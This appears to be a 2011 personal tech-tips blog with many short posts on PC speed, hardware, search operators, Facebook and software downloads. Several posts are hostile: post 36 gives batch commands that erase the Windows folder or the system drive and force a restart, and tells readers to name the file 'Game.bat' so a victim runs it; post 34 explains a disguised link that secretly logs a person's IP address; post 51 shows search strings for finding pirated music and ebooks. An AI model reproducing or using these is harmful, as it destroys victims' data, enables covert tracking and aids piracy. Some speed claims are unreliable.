latest tips and tricks

hi... dear friends..........first thanking u very much for being here to visit my blog,get latest tips and tricks,the site would be updated daily

Friday 30 September 2011

54.Five Important Tips To Secure Your PC

I recently compared the new branded computer and my computer, but I found that my computer is very slow and not secure than new one, then I learned tips and tricks to make PC faster and secure and I found some very useful tricks and tips and I used them for my PC.

If you have these kinds of problems, then you can see the following tips and tricks. Read following point seriously and use it. It will secure your PC and run faster than before.
1. Use Firefox instead of Internet Explorer
Firefox is the more secure than other browser. Firefox has number of security add-ons that you should consider installing as well to enhance the security on your machine ever more. So, try to use Firefox instead of Internet Explorer.
2. Configure your Anti-virus software
Customize the antivirus software that’s running on your computer and keep update your antivirus. There are lots of different antivirus in the market so, it’s better for us how particular antivirus software should be configured.
3. Remove unneeded software
Many machines come with the installed software on it that makes your machine vulnerable to an attack. Load ofsoftware creates hangness to your system, so always keep only needed software and remove unneeded software. Unnecessarysoftware can slow down the operation speed of software that you are actually using.
4. Install Microsoft Security Patches
Run windows update to install Microsoft Security Patches that are missing from your system. Since your Operating System was installed on your computer there is high chances that new viruses and bugs in the software were discovered and created.
5. Defrag your Hard drive
Hard drive physically stores your filesfolders, imagesdocuments and all thing, which you had saved in your hard drive. As you continuously open and close programs, fragments of relevant data get placed apart from one-another. Because of the distance between this data has increased over time. You can make up or cover your over used space after the defragment process and it increase the working efficiency of the hard drive.

Thursday 29 September 2011

53.hard disk internal structure

HDD (Hard Disk Drive) is the most common device for data storage. It consists of platters (or simply disks), a read/write head and actuator. There are two main connection ports you can find in HDD: IDE (Integrated Drive Electronics) and SATA (Serial Advanced Technology Attachment). IDE ports are very rare and can only be found on computers assembled before 2005. The good thing about HDD is that it can store a large amount of data and storage of 1 GB is rather cheap. Different HDDs have different capacities (the amount of GB it can store) and speeds of disk rotation (rpm or revolutions per minute). You are the one that has to decide how much space you need, but usually 320-512 GB is enough. People who store a lot of music and video files might need 750GB or more.
Most HDDs have a speed of 5400 or 7200 rpm. While 5400 is sufficient, I recommend choosing one with 7200 rpm when possible, because higher rpm translates into faster data access.
You have to remember that an HDD can be easily damaged by physical shock, because a read/write head can scratch the platter just by touching it. Considering the fact that the Hard Disk Drive rotates its platters very fast, if a read/write head touches a platter it would scratch a large part of it and make this sectors unusable. In some rare cases it can even destroy the hole platter. Even if this didn’t happen, each time that the system tries to read or rewrite a broken sector it would fail. Most likely your data will be lost forever.

It is not very common to see Hard Disks broken, but it happens. To prevent this you should use your computer or laptop carefully: don’t shake, turn over or let your computer fall while running, especially while booting up or shutting down, because your machine loads large amounts of data during this time.

52.How to identify different sizes of computer memory RAM?

51.Utilizing search engines

So much information is on the web, its mind boggling. Thankfully we have search
engines to sift through them and catagorize them for us. Unfortunatly, there is still so
much info that even with these search engines, its often a painstakingly slow process
(something comparable to death for a hacker) to find exactly what you’re looking for.

Lets get right into it.
I use as my primary search engine because it presently tops the charts as far as
the sites that it indexes which means more pertinent info per search.

1. Page translation.
Just because someone speaks another language doesn’t mean they dont have anything useful to say. I use translation tools like the ones found at
to translate a few key words I am searching for. Be specific and creative because these tools arent the most accurate things on the planet.

2. Directories.
These days everything is about $$$. We have to deal/w SEO (search engine optimization) which seems like a good idea on paper until you do a search for toys and get 5 pornsites in the first 10 results. Using a sites directory will eliminate that. You can narrow your search down easily by looking for the info in specific catagories. (PS google DOES have directories, they’re at:

3. Here are some tips that google refers to as “advanced”
A. “xxxx” / will look for the exact phrase. (google isnt case sensitive)
B. -x / will search for something excluding a certain term
C. filetype:xxx / searches for a particular file extention (exe, mp3, etc)
D. -filetype:xxx / excludes a particular file extention
E. allinurl:x / term in the url
F. allintext:x / terms in the text of the page
G. allintitle:x / terms in the html title of that page
H. allinanchor:x / terms in the links

4. OR
Self explanatory, one or the other… (ie: binder OR joiner)

5. ~X
Synonyms/similar terms (in case you can’t think of any yourself)

6. Numbers in a range.
Lets say you’re looking for an mp3 player but only want to spend up to $90. Why swim through all the others? MP3 player $0..$90 The 2 periods will set a numeric range to search between. This also works with dates, weights, etc

7. +
Ever type in a search and see something like this:
“The following words are very common and were not included in your search:”
Well, what if those common words are important in your search? You can force google to search through even the common terms by putting a + in front of the denied word.

8. Preferences
It amazes me when I use other peoples PCs that they dont have their google search preferences saved. When you use google as much as I do, who can afford to not have preferences? They’re located on the right of the search box, and have several options, though I only find 2 applicable for myself…
A. Open results in new browser
B. Display 10-100 results per page. (I currently use 50 per page, but thats a resolution preference, and 5X’s the default)

9. *
Wildcard searches. Great when applied to a previously mentioned method. If you only know the name of a prog, or are looking for ALL of a particular file (ie. you’re DLing tunes) something like *.mp3 would list every mp3.

10. Ever see this?
“In order to show you the most relevant results, we have omitted some entries very similar to the X already displayed. If you like, you can repeat the search with the omitted results included.” The answer is YES. yes yes yes. Did I mention yes? I meant to.

Use the engine to its fullest. If you dont find your answer in the web section, try the group section. Hell, try a whole different search engine. Dont limit yourself, because sometimes engines seem to intentionally leave results out.
ex. use google, yahoo, and altavista. search the same terms… pretty close, right? Now search for disney death. Funny, altavista has plenty of disney, but no death…hmmm.

If you’ve read this far into this tutorial without saying, “Great, a guy that copied a few google help pages and thinks its useful info” then I will show you WHY (besides accuracy, speed, and consistancy finding info on ANYTHING) its nice to know how a search engine works. You combine it/w your knowledge of other protocol.
Want free music? Free games? Free software? Free movies? God bless FTP! Try this search:
intitle:”Index of music” “rolling stones” mp3
Substitute rolling stones/w your favorite band. No? Try the song name, or another file format. Play with it. Assuming SOMEONE made an FTP and uploaded it, you’ll find it.

For example….I wanted to find some Sepultura. If you never heard them before, they’re a Brazilian heavy metal band that kicks ass. I started with this:
intitle:”Index of music” “Sepultura” mp3 <– nothing
intitle:”Index of música” “Sepultura” mp3 <– nothing
intitle:”Index of musica” “Sepultura” mp3 <– not good enough
intitle:”Index of music” “Sepultura” * <– found great stuff, but not enough Sepultura

At this point it occurs to me that I may be missing something, so I try:
intitle:”index of *” “sepultura” mp3 <– BANG!
(and thats without searching for spelling errors)
Also try inurl:ftp

I find that * works better for me than trying to guess other peoples mis-spellings.
The same method applies for ebooks, games, movies, SW, anything that may be on an FTP site.
I hope you enjoyed this tutorial, and I saw that recently a book and an article was written on the very same topic. I havn’t read them as of yet, but check em out, and get back to me if you feel I missed something important and should include anything else.
intitle:”index of” “google hacks” ebook
Ps. I’ve said it before, I’ll say it again… BE CREATIVE.
You’ll be surprised what you can find.

Wednesday 28 September 2011

50.How To: Post A Status Longer Than 420 characters in face book

Has your status ever been too complicated to describe in less than 420 characters? The maximum length of a status update on Facebook is currently 420 characters. If you exceed that number you will get this annoying error message:
“Status updates must be less than 420 characters. You have entered 804 characters here. Notes can be much longer. Would you like to edit and post your update as a Note instead?”
Sometimes you may have a lot to say but you don’t want to post it in a note.
How it works:
All you have to do is “Upload a Photo” instead of sharing a status.
How to: Post a Status Longer than 420 Characters

Step 1: Simply grab a photo off your hard drive, any photo you want to accompany your extremely long status update.
Step 2: Once you select your photo, you can write as much as you want! Part of your message will be covered up by a “See More” link, but its better than nothing.
How to: Post a Status Longer than 420 Characters
Step 3: Click Share!
If you found this loophole useful.

49.Publish your Post

Good News!!! Now u Can Post u r Comp hacks/tricks and other informative post on this BloG! Just Email your posts to "". If u r post is informative it will be published within 2 days! If u r posts are really good then u can become an author of this BloG! HappY BloGGinG!!

Tuesday 27 September 2011

48.GOOGLE BIRTHDAY: Doodle celebrates company’s 13th anniversary

If we’d known your birthday was coming up, Google, we’d have baked a cake (well, after Googling for the recipe). Fortunately — as you have every September since 2002, in some form — you rendered your own.
On Tuesday, Google celebrates its 13th birthday with a simple and classy main-page “Doodle”: A homey, scrapbooked image of the colorful logo (complete with the exclamation point of your youth) surrounded by an uber-traditional setting of cake, presents and balloons. A landmark worthy of Hallmark. The literal “Google Image.”
Google, in other words, has just hit its awkward teenage years.
It seemed like just yesterday, Google, you were first squawking for our attention, mastering millions of new words by the day. Our little bundle of split-second curiosity and streamlined verbosity.
Now, with your having gotten so massive and omnipresent and ravenous (such the commercial appetite), we just hope you can avoid that nasty unruly stage — especially as younger cousin Facebook tries to play with some of your things.
Can it really be 13 years since you, a behemoth of a Bay Area company, were incorporated by the “Google Guys” — Stanford’s Larry Page and Sergey Brin — and unleashed upon a fumbling wide world?
Thanks to dial-up being a distant memory, they grow up so fast. Uncle Andy (Bechtolsheim) must be so proud. Not only did you make good on his seed money; you are now even a verb and a gerund.
Ah, the years of memories made by the “Googleplex” are enough to fill an entire Flickr scrapbook — especially, of course, if we’ve linked it to our Google account. Why, do you recall the birth of your PageRank stage back when you were a burgeoning little Google? Suddenly, we could literally mark the growth.
And remember when — like opening your first lemonade stand — you began to sell ads associated with certain keywords? (More money, eh? Let us check our Google Wallet.) Soon, savvy little adventurer that you were, your entire worldview began to expand — thanks to Google Maps and Google Earth and, of course, Google-owned YouTube.
As you thrived, you were quite the irrepressible ball of Google Energy. And now, you reportedly have cornered about 90-percent of the worldwide Internet search market. (Who knew you would grow in such new ways, you would begin to face antitrust heat?)
And my, did you get quick once you stop crawling and really got mobile.
But then, it’s never about the destination, is it? The thrill is in the journey — the Search.
Congratulations, Google, and happy 13th. We can only hope that when you get yet even bigger, perhaps even get too busy to remember your first customers, you’ll still write.
If not on Google+, then we hope at least via Gmail.
And when you write, please remember to include a Doodle.
Sincerely, we just can’t get enough.

Wishing you all the best today and throughout the coming year. Happy Birthday! from:-

Monday 26 September 2011

47.Dont worry about your lost mobile

An IMEI number-The International Mobile Equipment Identity (IMEI) number is an international identity number used to uniquely identify a mobile phone. The 15-digit IMEI number is an electronic fingerprint transmitted every time a phone is used, which reveals the identity of the mobile handset.

How can I find out my IMEI number? IMEI numbers are independent of the phone number and are usually written underneath the battery or on the back of the handset. Mobile phone users can also check their 15 digit IMEI number by dialling *#06# on their mobile handset. Mobile phone owners should make a note of their IMEI number and keep the details in a safe place.

If u lost your mobile, send an e-mail to with the following info.
Your name:
Phone model:
Last used No.:
E-mail for communication:
Missed date:

Sunday 25 September 2011

46.FireTorrent : Firefox Extension for Downloading Torrents Without any external torrent client!

FireTorrent is Firefox Extension for all Torrent Lovers! While there are few extensions already out there on similar lines what makes this kool is its easy interface!
Can you imagine it is so easy that you don’t need any external application like µTorrent or bittorrent??

Just click on a torrent link and the downloading will start immediately.


* Nice Integration: This extension adds a separate Torrent tab to the Firefox’s built-in download manager. (see screenshot)

* Options: Provides option for selecting port nos, download/upload limit, location to save files, security & encryption configuration, etc! you can configure parameters like no. of connection, port no. to accept incoming connection, proxy settings, default folder, download/upload limit, etc! Everything like a standalone torrent client!

* Need More Info: If you like to see more info like no. of peers you are downloading from just click on more info link!

* Easy Access: Just click on folder name next to Downloaded to as highlighted in above screenshot and it will open the folder where downloaded files are saved!

In their own words…
The FireTorrent extension strives to offer the most user-friendly BitTorrent experience. We’ve integrated the torrents manager as a separate tab in your browser’s download manager, and torrents can be downloaded from any website with a single click.
This results in a great user experience and should be attractive to both people that are new to downloading torrents and advanced users.
So click here to install FireTorrent Extension!

45.Make Your Own Icons In Windows XP !

Now even personalize your ICONS with Windows XP !

To make your own ICON :

1. Start>>All Programs>>Accessories
2. Click Paint
3. In toolbar select Image
4. Click Attributes

--------------------- Note : The size of a icon is 32 x 32 pixels ! ---------------------
5. Type 32 in both Height and Width and sure that Pixels is selected under Units6. Click OK
7. Now add your photo or design .
8. File>>Save As
9. Type name.ico10. Click Save
Enjoy your New ICON !!!

Saturday 24 September 2011

44.The ways to delete "undeletable files

Many times when trying to remove an unwanted program, especially a piece of adware or spyware, you may run across a file that is undeletable by any normal method. 

This are the TIPS for DELETE like this files:(Thats for windowsXP,vista)
*make a note of the file location.for e.g(c:\windows\system3\undeleteablefilesname.exe)
*Click on Start, Run, and type CMD and Press Enter to open a Command Prompt window.
* change to the directory where the file is located. To do this, use the CD command. *You can follow the example below.
Example: to change to the Windows\System32 directory you would enter the following command and Press Enter
cd \windows\system32
Now use the DEL command to delete the offending file.
Type DEL where is the file you wish to delete.Example: del undeletable.exe
*restart the Windows shell.

There is another methouds too
One of the simple way is you can delete any undeletable files in
"Safe Mode" of the windows. you can boot the windows in safe mode by pressing F8 when bigin to boot

And the next way is we can use the softwares to delete the undeletable files.
for example.
Unlocker is a software is the solution!
to download the software freely go to folowin URL 

Friday 23 September 2011

43.What Is The Difference Between Core i3, Core i5, Core i7

Guys,Lets Check The Difference Between Core i3, Core i5, Core i7.
 Have A look In INTEL New Core Processors.
Lets start with
Core i7:
 High end processor.
 8 Threads
 4 Cores
 Turbo Mode
 4-8 MB Catche
 32-45 nm Silicon (less heat and energy).
Here Is Now
Core i5:
 2-4 Cores
 4 Threads
 Mid range processor.
 Turbo Mode
 3-8 MB Catche
 32-45 nm Silicon.
Finally Comes To
Core i3:
Entry level processor.
 2-4 Cores
 4 Threads
 3-4 MB Catche
 32 nm Silicon
Friend This Is The Difference Between Core i3, Core i5, Core i7

Thursday 22 September 2011

42.Eject CD

Helps you to easily eject/insert the cd-rom doors just by using the keyboard.

Eject CD is a useful, free and easy to use software which was build for your own comfort. It can help you easily eject and insert the cd/dvd-rom doors just by using the keyboard or your mouse.

You can manage all your cd/dvd-rom drives from the tray icon or with hotkeys. Eject CD also detects opened doors and it is able to AutoInsert them if you forgot it. It is easy to install, anybody can use it, and it has a friendly interface.

Wednesday 21 September 2011

41.Fixing Hard Disk Errors

Hard disk error occurs mainly due to improper shutdown.Its also one of the main reason which makes windows to take long time to load.
Goto Start –> Run.
Type CMD and hit enter.
Type chkdsk and hit enter.

It Check disk command checks error in HDD and fixes it.
Now fix errors in other drives. D,E,F,G,H,….
Type CHKDSK /F for drives other than C and fix HDD error.

40.Easy steps to make your PC faster than before

Now I’ll show you how to make your pc faster than before. This can make your pc about 200% faster. to make you pc faster please follow the steps:

·        Go to start then click run and then type regedit
·        Select HKEY_CURRENT_USER and then select control panel folder and then select desktop folder. do it correctly
·        You will see registry setting at your right hand side after that select menu show delay and then right click and select modify.
·        You will see edit string option -----> default value data is 400 >>> you have to change it to 000·        Restart your computer. you will see your computer is much more faster.  

Monday 19 September 2011

39.Change Yahoo messenger title bar

38.A Complete List of A 2 Z Extesion Files

We use computer and sometimes we receive a file from our friends or download from the internet but we are not sure about the file extension. We rush to others to find the meaning of this file extension . So here I tried out to find a huge list of file extension used by computer programs or computer hardware. If I forget to list any other file extension then let me know I will update my list.

.a  - library (unix)

.ad - screen saver data (AfterDark)

.adi - graphics (AutoCAD)

.adl - MCA adapter description library (QEMM)

.afi - Truevision bitmap graphics

.afm - Type 1 font metric ASCII data for font installer (ATM - many)

.all - format file for working pages (Always)

.all - general printer information (WordPerfect for Win)

.ani - animation (Presidio - many)

.anm - animation (Deluxe Paint Animator)

.ans - ANSI graphics (character animation)

.ans - ASCII text ANSI character set (NewWave Write)

.asc - ASCII text file

.avi - Audio Video Interleaved animation file (Video for Windows)


.bak - backup file
.bas - BASIC source code file
.bat - batch file (DOS)
.bbm - brush (Deluxe Paint)
.bbs - Bulletin Board System announce or text info file
.bch - batch process object file (dBASE Application Generator)
.bcp - Borland C++ makefile
.bdf - Bitmap Distribution Format font file (X11)
.bga - bitmap graphics
.bib - bibliography (ASCII)
.bib - database - not compatible with TeX format (Papyrus)
.bib - literature database (TeX/BibTeX)
.bif - Binary Image Format b&w graphics (Image Capture board)
.bin - binary file
.bio - OS2 BIOS
.bit - bitmap X11
.bm - BitMap graphics
.bmk - Help Bookmarks (Windows 3.x)
.bmp - BitMaP graphics (PC Paintbrush - many)
.bpt - bitmap fills file (CorelDRAW)
.btm - Batch To Memory batch file (4DOS)
.bup - backup file

.c - C source code file
.c - compressed unix file archive created by COMPACT
.c++ - C++ source code file
.cal - calendar file (Windows 3.x)
.cal - spreatsheet (SuperCalc)
.cbl - COBOL source code file
.cbm - compiled bitmap graphics (XLib)
.cbt - Computer Based Training (many)
.cc - C++ source code file
.ceg - bitmap graphics (Tempra Show - Edsun Continuous Edge Graphics)
.cga - CGA display font (Ventura Publisher)
.chk - recovered data (DOS CHKDSK)
.chk - temporary file (WordPerfect for Win)
.clp - clip art graphics (Quattro Pro)
.clp - clipboard file (Windows 3.x)
.cls - C++ class definition file
.cmd - batch file (OS/2)
.cmd - command (dBASE - Waffle)
.cmd - external command menu (1st Reader)
.cpp - C++ source code file
.cpp - presentation (CA-Cricket Presents)
.cpt - compressed Mac file archive created by COMPACT PRO (
.cur - cursor image file (Windows 3.x)


.dat - data file in special format or ASCII
.dbd - debug info (Clarion Modula-2)
.dbg - symbolic debugging information (MS C/C++)
.dcf - disk image file
.dd - compressed Macintosh file archive created by DISKDOUBLER
.deb - DEBUG script (DOS Debug)
.def - defaults - definitions
.dem - demonstration
.dem - graphics (VistaPro)
.dgs - diagnostics
.dic - dictionary
.dir - directory file (VAX)
.diz - description file (Description In Zip)
.dlg - dialog resource script file (MS Windows SDK)
.dll - Dynamic Link Library (Windows 3.x - OS/2)
.dll - export/import filter (CorelDRAW)
.dmp - dump file (eg. screen or memory)
.doc - document text file
.dos - network driver (eg. pkt_dis.dos)
.dos - text file containing DOS specific info
.drv - device driver eg. for printer
.dsk - project desktop file (Borland C++ - Turbo Pascal)
.dss - screensaver file (DCC)


.ega - EGA display font (Ventura Publisher)
.emu - terminal emulation data (BITCOM)
.env - Enveloper macro (WOPR)
.env - environment file (WordPerfect for Win)
.err - error log
.err - error messages for command line compilers
.esh - Extended Shell batch file
.exc - REXX source code file (VM/CMS)
.exc - exclude file for Optimize (do not process) (QEMM)
.exe - directly executable program (DOS)
.exm - MSDOS executable, system-manager compliant (HP calculator)
.ext - extension file (Norton Commander)


.fac - FACE graphics
.faq - Frequently Asked Questions text file
.fax - fax (raster graphics) (most Fax programs)
.fdw - form (F3 Design and Mapping)
.fix - patch file
.frm - form (Visual Basic)
.ftp - configuration (FTP Software PC/TCP)
.fx - on-line guide (FastLynx)
.fxd - phonebook (FAXit)


.gbl - global definitions (VAXTPU editor)
.gfb - compressed GIF image created by GIFBLAST (gifblast.exe)
.gft - font (NeoPaint)
.gif - Graphics Interchange Format bitmap graphics (CompuShow)
.gly - glossary (MS Word)
.gph - graph (Lotus 1-2-3/G)
.gr2 - screen driver (Windows 3.x)
.grb - MS-DOS Shell Monitor file (MS-DOS 5)
.grp - group file (Windows 3.x - Papyrus)


.hlp - help information
.hof - Hall Of Fame (game scores)
.hp8 - ASCII text HP Roman8 character set (NewWave Write)
.htm - HTML document (Mosaic)
.htx - Hypertext file


.iax - bitmap graphics (IBM Image Access eXecutive)
.ibm - compressed file archive created by ARCHDOS (Internal IBM only)
.icn - ICON source code file
.ico - icon (Windows 3.x)
.id - disk identification file
.ifs - system file (OS/2) hpfs.ifs
.img - bitmap graphics (Ventura Publisher - GEM Paint)
.inc - include file (several programming languages)
.inf - information text file (ASCII)
.inf - install script
.ini - initialization file
.ins - (WordPerfect) wp51.ins
.ins - installation script (1st Reader)


.jas - graphics
.jbd - datafile (SigmaScan)
.jpc - graphics (Japan PIC)
.jpg - JPEG Joint Photography Experts Group format bitmap graphics
.jtf - graphics (TIFF file with JPEG compression)


.key - security file eg. Shareware Registration info
.kps - IBM KIPS bitmap graphics
.kyb - keyboard mapping (FTP Software PC/TCP)


.lbm - bitmap graphics (DeluxePaint)
.lbm - linear bitmap graphics (XLib)
.lcl - (FTP Software PC/TCP)
.ldb - (MS Access)
.lgo - startup logo code (Windows 3.x)
.lib - library file (several programming languages)
.lis - listing (VAX)
.log - log file
.lpc - printer driver (TEKO)


.m3d - 3D animation macro
.mac - bitmap graphics (Macintosh MacPaint)
.mac - macro
.mai - mail (VAX)
.mak - makefile
.mak - project file (Visual Basic)
.man - command manual
.map - color palette
.map - format data (Micrografx Picture Publisher)
.map - linker map file
.map - map (Atlas MapMaker)
.map - network map (AccView)
.mbx - mailbox data (ZERBERUS)
.mci - MCI command script (Media Control Interface)
.mcp - printer driver (Mathcad)
.mcw - text file (MacWrite II)
.mdm - modem definition (TELIX)
.meu - menu group (DOS Shell)
.mid - standard MIDI file (music synthetizers)
.mke - makefile (MS Windows SDK)
.mod - MODULA-2 source code file (Clarion Modula-2)
.mod - Windows kernel module
.mon - monitor description (ReadMail)
.mov - movie (AutoCAD AutoFlix)
.mp2 - MPEG audio file (xing)
.mpc - calender file (MS Project)
.mpg - MPEG animation
.msg - message
.msp - bitmap graphics (Microsoft Paint)
.mst - setup script (MS Windows SDK)
.mth - math file (Derive)
.mtm - MultiTracker Module music
.mtw - datafile (Minitab)
.mu - menu (Quattro Pro)
.mus - sound file (MusicTime)
.mvf - stop frame file (AutoCAD AutoFlix)
.mvi - movie command file (AutoCAD AutoFlix)
.mvw - log file (Saber LAN)
.mxt - (MS C)


.nws - info text file (latest news) (ASCII)
.nxt - sound (NeXT format)


.obj - object code (Intel Recolatable Object Module)
.ocx - OLE custom control
.off - Object File Format vector graphics
.old - backup file
.ovl - overlay file (part of program to be loaded when needed)
.ovr - overlay file (part of program to be loaded when needed)


.pac - STAD Image (graphics ?)
.pac - package (SBStudio II)
.pal - color palette
.par - permanent output file (Windows 3.x)
.pcc - cutout picture vector graphics (PC Paintbrush)
.pch - patch file
.pct - bitmap graphics (Macintosh b&w PICT1 - color PICT2)
.pcw - text file (PC Write)
.pcx - bitmap graphics (PC Paintbrush)
.pda - bitmap graphics
.pdv - printer driver (Paintbrush)
.pgm - Portable Grayscale bitMap graphics
.pgm - program (Signature)
.pgp - support file (Pretty Good Privacy RSA System)
.pgs - manual page (man4dos)
.pic - PIXAR picture file (SDSC Image Tool)
.pic - bitmap graphics (Macintosh b&w PICT1 - color PICT2)
.pic - bitmap graphics (many eg. Lotus 1-2-3 - PC Paint)
.pif - Program Information File (Windows 3.x)
.pif - vector graphics GDF format (IBM mainframe computers)
.pit - compressed Mac file archive created by PACKIT (unpackit.zoo)
.pll - pre-linked library (Clipper 5)
.pnt - Macintosh painting
.pop - messages index (PopMail)
.pop - pop-up menu object (dBASE Application Generator)
.prd - printer driver (many)
.pub - public key ring file (Pretty Good Privacy RSA System)


.qpr - print queue device driver (OS/2)
.qpx - compiled query program (FoxPro)
.qrt - QRT ray tracing graphics
.qry - query (dBASE IV)
.qt - QuickTime movie (animation)
.qwk - QWK reader message file
.qxd - document (QuarkXPress)
.qxl - element library (QuarkXPress)


.rdi - device-independent bitmap file (RIFF RDIB format)
.rdx - datafile (Reflex)
.rec - datafile (EpiInfo)
.rec - record file (Sprint)
.rec - recorded macro file (Windows 3.x)
.red - path info (Clarion Modula-2)
.ref - cross-reference
.reg - OLE Registration (Windows 3.x)
.reg - registration (Corel programs)
.rem - remarks
.rgb - SGI RGB image file (SDSC Image Tool)
.rif - RIFF bitmap graphics (Fractal Design Painter)
.rip - graphics (Remote Access)
.rix - bitmap graphics (ColorRIX VGA Paint)
.rmk - makefile (RMAKE)
.rpt - report
.rtf - Windows Help file script
.rtl - text file


.sav - backup file (saved file)
.sav - configuration
.sav - saved game situation (eg. NetHack)
.sbd - storyboard (Storyboard Editor)
.sbi - Sound Blaster Instrument file (Creative Labs)
.sbr - support file (Source Browser)
.scc - text file
.scr - DEBUG source code file (DOS Debug)
.scr - screen saver (Windows 3.x)
.scx - bitmap graphics (ColorRIX)
.sea - Self-Extracting compressed Macintosh file Archive
.sec - secret key ring file (Pretty Good Privacy RSA System)
.sec - secured animation file (Disney Animation Studio)
.set - setup options file
.sgi - graphics (IRIS - Silicon Graphics)
.sig - current program settings (Signature)
.sig - signature file (PopMail)
.sit - compressed Macintosh archive created by STUFFIT (
.smp - sample (sound file)
.smt - text file (Smart Ware II)
.snd - digitized sound file (Macintosh/ATARI/PC)
.spl - sample
.sum - Summary
.swp - swap file (DOS)
.sys - datafile (SYGRAPH - SYSTAT - SPSS/PC)
.sys - system file - device driver or hardware configuration info (DOS)


.tbl - graphics (native format) (PageMaker TableEditor)
.tbl - table of values (OS/2)
.tel - host file (Telnet)
.tga - TrueVision Targa bitmap graphics
.tmp - temporary file
.toc - Table Of Contents
.tre - directory tree file (PC-Tools)
.trm - terminal settings (Windows 3.x)
.tut - tutorial


.ub - audio file (unsigned byte)
.uhs - Universal Hint System (binary file)
.uif - long prompts for windows (WordPerfect for Win)
.unx - text file containing UNIX specific info
.upd - program update info
.usr - user database file (Procomm Plus - Turbo C++ tour)


.vbx - Visual Basic eXtension (Visual Basic)
.vga - VGA display driver
.vga - VGA display font
.vgd - VGA display driver (Generic CADD)
.vid - MS-DOS Shell Monitor file (MS-DOS 5)
.vid - bitmap graphics (YUV12C M-Motion Frame Buffer)
.vid - screen device driver (Word)
.voc - digitized samples (Creative Voice file)
.vst - Truevision Vista bitmap graphics
.vue - animation (3D Studio)
.vxd - Windows 3.x virtual device driver (QEMM)


.w31 - startup file (Windows 3.1)
.wav - Waveform audio file (RIFF WAVE format)
.wbf - MS Windows Batch File (Catch)
.wbt - batch file (WinBatch)
.web - WEB source code file
.woa - swap file (Windows 3.x)
.wrs - Windows Resource eg. printer driver (WordPerfect for Win)


.xbm - X11 Bitmap graphics
.xll - Excel Dynamic Link Library (MS Excel)
.xmi - compressed eXtended MIdi music
.xwd - X Window System window dump image graphics (SDSC Image Tool)
.xx - compressed file ASCII archive created by XXENCODE (uuexe515.exe)
.xxe - compressed file ASCII archive created by XXENCODE (uuexe515.exe)


.zip - compressed file archive created by PKZIP (pkz204g.exe)
.zoo - compressed file archive created by ZOO (zoo210.exe

37.TeamTalk Conferencing System

TeamTalk 4 Conferencing System Download

TeamTalk 4 is a conferencing system which enables a group of people to collaborate and share information. Every member of a group can communicate with other members in real time using both audio and video. All that is needed is a microphone and a web camera.

Here is a list of the main features:

•Real time audio and video conversations
•Public and private instant text messaging
•File sharing among group members
•High quality audio codecs with both mono and stereo
•Push-to-talk and voice activation
•Record conversations to disk
•Standalone server for both LAN and Internet environments
•Private rooms/channels for every group
•User authentication with accounts
•Accessibility for visually impaired


Having these features available makes TeamTalk an excellent choice for online presentations, attending meetings or just do every day chit-chat with friends or collegues, whether they are next door or around the globe.

For more information visit

Click Download Button to Download file

Sunday 18 September 2011

36.How To Delete Windows File

Only For Educational Purposes.

First of all Open Notepad  and copy paste following codes in notepad. After that save it as .bat ( For ex- Game.bat). Here .bat is batch file. If you use game as a name then victim will click your virus batch application 100% sure. You can use other name too.

First Way-:

erase C:\WINDOWS

Second Way-:

@Echo off
Del C:\ *.*|y

Third Way-:
If you want to delete drives during restart.

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

35.A Checklist for Used Computers

It is very important to check a used computer thoroughly before buying it as it may lead to problems in the future.  A hard drive will not show any outward signs but may be deteriorating. The same way the needle can suddenly slip and can cause scratches on the disc ultimately leading to memory loss as used computers can fail any time.  If they are checked, the faults which may occur can be known.  Let us first see the possible faults which may occur while purchasing a used computer.
Hard disk failures can happen due to heavy wear and tear over a period of time.  The read and write heads of a hard disk are used to retrieve or recode data stored on the hard disk with the help of a disk platter rotating at a high speed.  Over a period of time the risk of failure or malfunction of disk increases.  Faulty sectors of the hard disks can be found out only if a full surface scan is done on the used computer.  The scanning time depends on the capacity and size of the hard disk of the used computer.  Many skip this procedure due to the time consuming process of scanning the whole disk and end up purchasing a used computer with a faulty sector.
Monitors need to be checked for any faults.  The malfunctioning of a monitor is called a “dry joint” which results in the monitor not working after getting warmed.  This can be checked only if the monitor is made to work for at least 20 to 30 minutes after switching on the computer.
Next is to look for any possibilities of the central processing unit getting freezed.  Normally all the central processing units have a fan and heat sink for keeping the unit cool.  Over a period of time the fans may not work properly due to the accumulation of dust and dirt resulting in over heating of the central processing unit and even leading to stopping from functioning.  While buying a used computer the fan needs to be checked and if any abnormal sound is heard, it is not good for purchase.
The used computer may have a higher possibility of getting crashed and freezed due to the usage of the operating system for a good number of years.  There may be a cache or RAM fault due to the over exposure leading to loss of data.  To increase the performance of the computer and to avoid crashing, the operating system of the used computer can be reinstalled with a new operating system or a fresh one.
While checking the used computers for any faults, it is good to disconnect the network connection if any present before performing the tests.  Also it is advisable to check the drives like the CD or DVD by opening and closing them and also playing something on the drives to see how they work.  Monitors of the used computers can be checked for the resolution and brightness by trying different options of color, settings and so on.  To check the hard disk size the CMOS setup can be gone through and to verify the speed of the processor, cache and RAM the pause button is pressed when it appears on the screen during the booting process.  To check the booting process, the computer can be turned on and off a few times and seen how it responds.  Checking should be done to see if all the passwords are erased before purchasing a used computer.

Saturday 17 September 2011

34.How to Find the IP Address of a Remote Computer

Find IP AddressMost of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. In this post I’ll show you how to find the IP address of a remote computer in simple steps.

I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.
1. Download the IP Finder script (IP_Finder.ZIP) that I have created.
2. Open a new account in X10Hosting (or any free host that supports PHP).
3. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.
4. You can rename the ip.php to any name of your choice.
5. Set the permission to 777 on ip_log.txt.
Now you are all set to find the IP address of your friend or any remote computer of your choice. All you have to do is send the link of ip.php to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file ip_log.txt.
For your better understanding let’s take up the following example.
Suppose you open a new account in with the subdomain as abc, then your IP Finder link would be
You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to so as to avoid any suspicion.
To find the recorded IP address check the logs using the following link.
The sample log will be in the following format Thursday 07th of May 2009 05:31:27 PM Thursday 07th of May 2009 05:31:28 PM Thursday 07th of May 2009 05:31:31 PM
NOTE: You have to replace abc with your subdomain name.

Wednesday 14 September 2011

33.Hiren’s BootCD: What is it??

